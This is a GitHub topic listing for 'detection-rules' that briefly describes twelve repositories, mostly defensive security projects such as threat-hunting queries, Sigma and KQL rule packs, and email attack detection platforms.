detection-rules
There are 12 repositories under detection-rules topic.
checkmarble/marble
Marble - the real time decision engine for fraud and AML
sublime-security/sublime-platform
A free and open platform for detecting and preventing email attacks like BEC, malware, and credential phishing. Gain visibility and control, hunt for advanced threats, collaborate with the community, and write detections-as-code.
mandiant/thiri-notebook
The Threat Hunting In Rapid Iterations (THIRI) Jupyter notebook is designed as a research aide to let you rapidly prototype threat hunting rules.
polaris64/web_exploit_detector
The Web Exploit Detector is a Node.js application used to detect possible infections, malicious code and suspicious files in web hosting environments
0xAnalyst/DefenderATPQueries
Hunting Queries for Defender ATP
cylaris/awesomekql
Microsoft Sentinel, Defender for Endpoint - KQL Detection Packs
mthcht/ThreatHunting-Keywords-sigma-rules
Sigma detection rules for hunting with the threathunting-keywords project
Karneades/SigmaFilterCheck
Check Sigma rules for easy-to-bypass whitelists to make them more robust (https://github.com/SigmaHQ/sigma)
austinsonger/elastic-detection-cli
Docker Container for Elastic Detection CLI
vastlimits/uberAgent-config
uberAgent configuration: UXM settings & ESA rules + checks
colvert-project/colvert
Manage your detection use cases portfolio
gapsc-us/labcomdig
Files for the lab of Digital Communications at the University of Seville.